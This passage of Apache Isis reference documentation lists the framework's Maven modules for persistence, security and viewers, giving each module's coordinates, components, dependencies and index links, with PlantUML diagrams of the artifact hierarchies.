Isis - JDK Supplemental\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-jdk-supplemental\nType: pom\nDirectory: \/core\/jdk-supplemental\n----\n|Defines a module to bring in dependencies that were part of JDK 8 but\nhad been removed with later JDK versions.\n\nWill be removed once the framework migrates to Java 11 as the required\nminimum version.\n\n.Dependencies\n****\ncom.fasterxml.woodstox:woodstox-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-core:jar:<managed> +\ncom.sun.xml.bind:jaxb-impl:jar:<managed> +\ncom.sun.xml.ws:jaxws-ri:pom:<managed> +\ncom.sun.xml.ws:jaxws-rt:jar:${jaxws-ri.version} +\njavax.xml.bind:jaxb-api:jar:<managed> +\norg.codehaus.woodstox:stax2-api:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.moxy:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.sdo:jar:<managed> +\n****\n\n|Apache Isis Core - Schemas\n[source,yaml]\n----\nGroup: org.apache.isis.core\nArtifact: isis-schema\nType: jar\nDirectory: \/api\/schema\n----\n|Apache Isis schemas, for conversion into canonical DTOs (for use in integration scenarios).\n\n.Dependencies\n****\njoda-time:joda-time:jar:<managed> +\norg.springframework:spring-context:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:schema:index\/IsisModuleSchema.adoc[IsisModuleSchema]\n****\n|===\n\n== Persistence\n\n=== JDO\n\n[plantuml,JDO,svg]\n----\n@startuml(id=JDO)\ntitle JDO - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<8>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JDO\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JDO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JDO (Spring)\\n<size:10>[Container: packaging: jar]<\/size>\" <<8>> as 8\n rectangle \"==Apache Isis Persistence - JDO (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JDO (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JDO (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JDO (provider)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n rectangle \"==Apache Isis Persistence - JDO Provider (DataNucleus)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 8 : \"\"\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JDO)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JDO\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo\nType: pom\nDirectory: \/persistence\/jdo\n----\n|Supplementary applib for JDO persistence\n\n|Apache Isis Persistence - JDO (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-applib\nType: jar\nDirectory: \/persistence\/jdo\/applib\n----\n|Supplementary applib for JDO persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.datanucleus:javax.jdo:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jdo\/applib\/IsisModulePersistenceJdoApplib.adoc[IsisModulePersistenceJdoApplib], xref:refguide:persistence:index\/jdo\/applib\/services\/JdoSupportService.adoc[JdoSupportService]\n****\n\n|Apache Isis Persistence - JDO Provider (DataNucleus)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-datanucleus\nType: jar\nDirectory: \/persistence\/jdo\/datanucleus\n----\n|JDO Implementation (powered by DataNucleus)\n\n.Components\n****\no.a.i.persistence.jdo.datanucleus.config.DnEntityDiscoveryListener +\no.a.i.persistence.jdo.datanucleus.entities.DnEntityStateProvider +\no.a.i.persistence.jdo.datanucleus.jdosupport.JdoSupportServiceDefault +\no.a.i.persistence.jdo.datanucleus.metamodel.JdoDataNucleusProgrammingModel +\n****\n\n.Dependencies\n****\ncom.h2database:h2:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-integration:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.datanucleus:datanucleus-api-jdo:jar:<managed> +\norg.datanucleus:datanucleus-core:jar:<managed> +\norg.datanucleus:datanucleus-jdo-query:jar:<managed> +\norg.datanucleus:datanucleus-jodatime:jar:<managed> +\norg.datanucleus:datanucleus-rdbms:jar:<managed> +\norg.springframework.boot:spring-boot-starter-jdbc:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jdo\/datanucleus\/IsisModuleJdoDatanucleus.adoc[IsisModuleJdoDatanucleus], xref:refguide:persistence:index\/jdo\/datanucleus\/changetracking\/JdoLifecycleListener.adoc[JdoLifecycleListener], xref:refguide:persistence:index\/jdo\/datanucleus\/dialect\/DnJdoDialect.adoc[DnJdoDialect], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusIdLong.adoc[Persistable_datanucleusIdLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionLong.adoc[Persistable_datanucleusVersionLong], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_datanucleusVersionTimestamp.adoc[Persistable_datanucleusVersionTimestamp], xref:refguide:persistence:index\/jdo\/datanucleus\/mixins\/Persistable_downloadJdoMetadata.adoc[Persistable_downloadJdoMetadata], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisBookmarkConverter.adoc[IsisBookmarkConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisLocalResourcePathConverter.adoc[IsisLocalResourcePathConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisMarkupConverter.adoc[IsisMarkupConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/applib\/IsisPasswordConverter.adoc[IsisPasswordConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/image\/JavaAwtBufferedImageByteArrayConverter.adoc[JavaAwtBufferedImageByteArrayConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisChangesDtoConverter.adoc[IsisChangesDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisCommandDtoConverter.adoc[IsisCommandDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisInteractionDtoConverter.adoc[IsisInteractionDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/schema\/v2\/IsisOidDtoConverter.adoc[IsisOidDtoConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoOffsetTimeConverter.adoc[IsoOffsetTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/typeconverters\/time\/IsoZonedDateTimeConverter.adoc[IsoZonedDateTimeConverter], xref:refguide:persistence:index\/jdo\/datanucleus\/valuemappings\/applib\/ByteArrayBlobRdbmsMapping.adoc[ByteArrayBlobRdbmsMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisBlobMapping.adoc[IsisBlobMapping], xref:refguide:persistence:index\/jdo\/datanucleus\/valuetypes\/applib\/IsisClobMapping.adoc[IsisClobMapping]\n****\n\n|Apache Isis Persistence - JDO (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-integration\nType: jar\nDirectory: \/persistence\/jdo\/integration\n----\n|JDO Integration (powered by DataNucleus)\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-spring:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-metamodel\nType: jar\nDirectory: \/persistence\/jdo\/metamodel\n----\n|JDO Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jdo.metamodel.JdoProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (provider)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-provider\nType: jar\nDirectory: \/persistence\/jdo\/provider\n----\n|JDO Provider to be implemented by any actual JDO provider eg. DataNucleus.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-metamodel:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\n****\n\n|Apache Isis Persistence - JDO (Spring)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jdo-spring\nType: jar\nDirectory: \/persistence\/jdo\/spring\n----\n|JDO Spring integration.\n\nThis is a fork of the Spring ORM JDO sources at github,\nfor which support had been dropped back in 2016 [1].\n\nCredits to the original authors. See also docs [2].\n\n[1] https:\/\/github.com\/spring-projects\/spring-framework\/issues\/18702\n[2] https:\/\/docs.spring.io\/spring-framework\/docs\/3.0.0.RC2\/reference\/html\/ch13s04.html\n\n.Dependencies\n****\njavax.servlet:javax.servlet-api:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-config:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jdo-provider:jar:<managed> +\norg.springframework:spring-jdbc:jar:<managed> +\norg.springframework:spring-web:jar:<managed> +\n****\n|===\n\n=== JPA\n\n[plantuml,JPA,svg]\n----\n@startuml(id=JPA)\ntitle JPA - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"JPA\\n[Software System]\" {\n rectangle \"==Apache Isis Persistence - JPA\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Persistence - JPA (applib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Persistence - JPA (integration)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Persistence - JPA (metamodel)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Persistence - JPA EclipseLink\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 4 : \"\"\n@enduml\n----\n.Projects\/Modules (JPA)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Persistence - JPA\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa\nType: pom\nDirectory: \/persistence\/jpa\n----\n|Apache Isis JPA integration\n\n|Apache Isis Persistence - JPA (applib)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-applib\nType: jar\nDirectory: \/persistence\/jpa\/applib\n----\n|Supplementary applib for JPA persistence\n\n.Dependencies\n****\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/applib\/integration\/JpaEntityInjectionPointResolver.adoc[JpaEntityInjectionPointResolver], xref:refguide:persistence:index\/jpa\/applib\/services\/JpaSupportService.adoc[JpaSupportService]\n****\n\n|Apache Isis Persistence - JPA EclipseLink\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-eclipselink\nType: jar\nDirectory: \/persistence\/jpa\/eclipselink\n----\n|EclipseLink integration. Sets up EclipseLink as the implementation provider for Spring Data JPA.\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-integration:jar:<managed> +\norg.eclipse.persistence:org.eclipse.persistence.jpa:jar:2.7.8 +\norg.springframework.boot:spring-boot-starter-data-jpa:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:persistence:index\/jpa\/eclipselink\/IsisModuleJpaEclipselink.adoc[IsisModuleJpaEclipselink]\n****\n\n|Apache Isis Persistence - JPA (integration)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-integration\nType: jar\nDirectory: \/persistence\/jpa\/integration\n----\n|JPA integration (facets, jpa-context)\n\n.Components\n****\no.a.i.persistence.jpa.integration.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-metamodel:jar:<managed> +\norg.springframework.data:spring-data-jpa:jar:<managed> +\n****\n\n|Apache Isis Persistence - JPA (metamodel)\n[source,yaml]\n----\nGroup: org.apache.isis.persistence\nArtifact: isis-persistence-jpa-metamodel\nType: jar\nDirectory: \/persistence\/jpa\/metamodel\n----\n|JPA Metamodel Facets \/ Programming Model\n\n.Components\n****\no.a.i.persistence.jpa.metamodel.JpaProgrammingModel +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.persistence:isis-persistence-jpa-applib:jar:<managed> +\n****\n|===\n\n== Security\n\n[plantuml,Security,svg]\n----\n@startuml(id=Security)\ntitle Security - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Security\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Spring\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Security)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Spring\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-spring\nType: jar\nDirectory: \/security\/spring\n----\n|Authentication using Spring Security\n\n.Components\n****\no.a.i.security.spring.authentication.AuthenticatorSpring +\no.a.i.security.spring.webmodule.WebModuleSpringSecurity +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.springframework.boot:spring-boot-starter-security:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/spring\/IsisModuleSecuritySpring.adoc[IsisModuleSecuritySpring], xref:refguide:security:index\/spring\/authentication\/AuthenticatorSpring.adoc[AuthenticatorSpring], xref:refguide:security:index\/spring\/webmodule\/SpringSecurityFilter.adoc[SpringSecurityFilter], xref:refguide:security:index\/spring\/webmodule\/WebModuleSpringSecurity.adoc[WebModuleSpringSecurity]\n****\n|===\n\n=== Bypass\n\n[plantuml,Bypass,svg]\n----\n@startuml(id=Bypass)\ntitle Bypass - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Bypass\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Bypass\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Bypass)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Bypass\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-bypass\nType: jar\nDirectory: \/security\/bypass\n----\n|.Components\n****\no.a.i.security.bypass.authentication.AuthenticatorBypass +\no.a.i.security.bypass.authorization.AuthorizorBypass +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/bypass\/IsisModuleSecurityBypass.adoc[IsisModuleSecurityBypass], xref:refguide:security:index\/bypass\/authentication\/AuthenticatorBypass.adoc[AuthenticatorBypass], xref:refguide:security:index\/bypass\/authorization\/AuthorizorBypass.adoc[AuthorizorBypass]\n****\n|===\n\n=== Keycloak\n\n[plantuml,Keycloak,svg]\n----\n@startuml(id=Keycloak)\ntitle Keycloak - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Keycloak\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Keycloak\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Keycloak)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Keycloak\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-keycloak\nType: jar\nDirectory: \/security\/keycloak\n----\n|Authentication and Authorization using Keycloak\n\n.Components\n****\no.a.i.security.keycloak.authentication.AuthenticatorKeycloak +\no.a.i.security.keycloak.webmodule.WebModuleKeycloak +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/keycloak\/IsisModuleSecurityKeycloak.adoc[IsisModuleSecurityKeycloak], xref:refguide:security:index\/keycloak\/authentication\/AuthenticatorKeycloak.adoc[AuthenticatorKeycloak], xref:refguide:security:index\/keycloak\/webmodule\/KeycloakFilter.adoc[KeycloakFilter], xref:refguide:security:index\/keycloak\/webmodule\/WebModuleKeycloak.adoc[WebModuleKeycloak]\n****\n|===\n\n=== Shiro\n\n[plantuml,Shiro,svg]\n----\n@startuml(id=Shiro)\ntitle Shiro - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Shiro\\n[Software System]\" {\n rectangle \"==Apache Isis Security - Shiro\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Shiro)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Security - Shiro\n[source,yaml]\n----\nGroup: org.apache.isis.security\nArtifact: isis-security-shiro\nType: jar\nDirectory: \/security\/shiro\n----\n|Authentication and Authorization using Apache Shiro.\n\n.Components\n****\no.a.i.security.shiro.authentication.AuthenticatorShiro +\no.a.i.security.shiro.authorization.AuthorizorShiro +\no.a.i.security.shiro.webmodule.WebModuleShiro +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.apache.isis.core:isis-core-runtimeservices:jar:<managed> +\norg.apache.isis.core:isis-core-webapp:jar:<managed> +\norg.apache.shiro:shiro-core:jar:<managed> +\norg.apache.shiro:shiro-web:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:security:index\/shiro\/IsisModuleSecurityShiro.adoc[IsisModuleSecurityShiro], xref:refguide:security:index\/shiro\/authentication\/AuthenticatorShiro.adoc[AuthenticatorShiro], xref:refguide:security:index\/shiro\/authorization\/AuthorizorShiro.adoc[AuthorizorShiro], xref:refguide:security:index\/shiro\/authorization\/IsisPermission.adoc[IsisPermission], xref:refguide:security:index\/shiro\/authorization\/IsisPermissionResolver.adoc[IsisPermissionResolver], xref:refguide:security:index\/shiro\/webmodule\/WebModuleShiro.adoc[WebModuleShiro]\n****\n|===\n\n== Viewer\n\n[plantuml,Viewer,svg]\n----\n@startuml(id=Viewer)\ntitle Viewer - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Viewer\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - Common Model\\n<size:10>[Container: packaging: jar]<\/size>\" <<2>> as 2\n}\n@enduml\n----\n.Projects\/Modules (Viewer)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - Common Model\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-common\nType: jar\nDirectory: \/viewers\/common\n----\n|.Components\n****\no.a.i.viewer.common.model.branding.BrandingUiModelProvider +\no.a.i.viewer.common.model.header.HeaderUiModelProvider +\no.a.i.viewer.common.model.menu.MenuUiModelProvider +\no.a.i.viewer.common.model.userprofile.UserProfileUiModelProvider +\n****\n\n.Dependencies\n****\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\norg.apache.isis.core:isis-core-runtime:jar:<managed> +\norg.webjars:font-awesome:jar:5.15.2 +\n****\n|===\n\n=== Restful Objects\n\n[plantuml,Restful Objects,svg]\n----\n@startuml(id=Restful_Objects)\ntitle Restful Objects - Containers\ncaption Artifact Hierarchy (Maven)\n\nskinparam {\n shadowing false\n arrowFontSize 10\n defaultTextAlignment center\n wrapWidth 200\n maxMessageSize 100\n}\nhide stereotype\nleft to right direction\nskinparam rectangle<<2>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<3>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<4>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<5>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<6>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\nskinparam rectangle<<7>> {\n BackgroundColor #438dd5\n FontColor #fffffe\n BorderColor #2E6295\n}\npackage \"Restful Objects\\n[Software System]\" {\n rectangle \"==Apache Isis Viewer - RO\\n<size:10>[Container: packaging: pom]<\/size>\" <<2>> as 2\n rectangle \"==Apache Isis Viewer - RO (AppLib)\\n<size:10>[Container: packaging: jar]<\/size>\" <<3>> as 3\n rectangle \"==Apache Isis Viewer - RO (JAX-RS Resteasy v4)\\n<size:10>[Container: packaging: jar]<\/size>\" <<4>> as 4\n rectangle \"==Apache Isis Viewer - RO (Rendering)\\n<size:10>[Container: packaging: jar]<\/size>\" <<5>> as 5\n rectangle \"==Apache Isis Viewer - RO (Testing)\\n<size:10>[Container: packaging: jar]<\/size>\" <<6>> as 6\n rectangle \"==Apache Isis Viewer - RO (Viewer)\\n<size:10>[Container: packaging: jar]<\/size>\" <<7>> as 7\n}\n2 .[#707070].> 3 : \"\"\n2 .[#707070].> 4 : \"\"\n2 .[#707070].> 5 : \"\"\n2 .[#707070].> 6 : \"\"\n2 .[#707070].> 7 : \"\"\n@enduml\n----\n.Projects\/Modules (Restful Objects)\n[cols=\"3a,5a\", options=\"header\"]\n|===\n|Coordinates |Description \n\n|Apache Isis Viewer - RO\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects\nType: pom\nDirectory: \/viewers\/restfulobjects\n----\n|\n\n|Apache Isis Viewer - RO (AppLib)\n[source,yaml]\n----\nGroup: org.apache.isis.viewer\nArtifact: isis-viewer-restfulobjects-applib\nType: jar\nDirectory: \/viewers\/restfulobjects\/applib\n----\n|.Dependencies\n****\ncom.fasterxml.jackson.core:jackson-databind:jar:<managed> +\norg.apache.isis.commons:isis-commons:jar:<managed> +\norg.apache.isis.core:isis-applib:jar:<managed> +\norg.apache.isis.core:isis-core-internaltestsupport:jar:<managed> +\n****\n\n.Document Index Entries\n****\nxref:refguide:viewer:index\/restfulobjects\/applib\/IsisModuleViewerRestfulObjectsApplib.adoc[IsisModuleViewerRestfulObjectsApplib], xref:refguide:viewer:index\/restfulobjects\/applib\/JsonRepresentation.adoc[JsonRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/LinkRepresentation.adoc[LinkRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/Rel.adoc[Rel], xref:refguide:viewer:index\/restfulobjects\/applib\/RelDefinition.adoc[RelDefinition], xref:refguide:viewer:index\/restfulobjects\/applib\/RepresentationType.adoc[RepresentationType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulHttpMethod.adoc[RestfulHttpMethod], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulMediaType.adoc[RestfulMediaType], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulRequest.adoc[RestfulRequest], xref:refguide:viewer:index\/restfulobjects\/applib\/RestfulResponse.adoc[RestfulResponse], xref:refguide:viewer:index\/restfulobjects\/applib\/boot\/BootstrapResource.adoc[BootstrapResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/AbstractObjectMemberRepresentation.adoc[AbstractObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ActionResultRepresentation.adoc[ActionResultRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectMemberRepresentation.adoc[DomainObjectMemberRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectRepresentation.adoc[DomainObjectRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainObjectResource.adoc[DomainObjectResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainRepresentation.adoc[DomainRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/DomainServiceResource.adoc[DomainServiceResource], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ListRepresentation.adoc[ListRepresentation], xref:refguide:viewer:index\/restfulobjects\/applib\/domainobjects\/ObjectActionRepresentation.adoc[ObjectActionRepresentation], 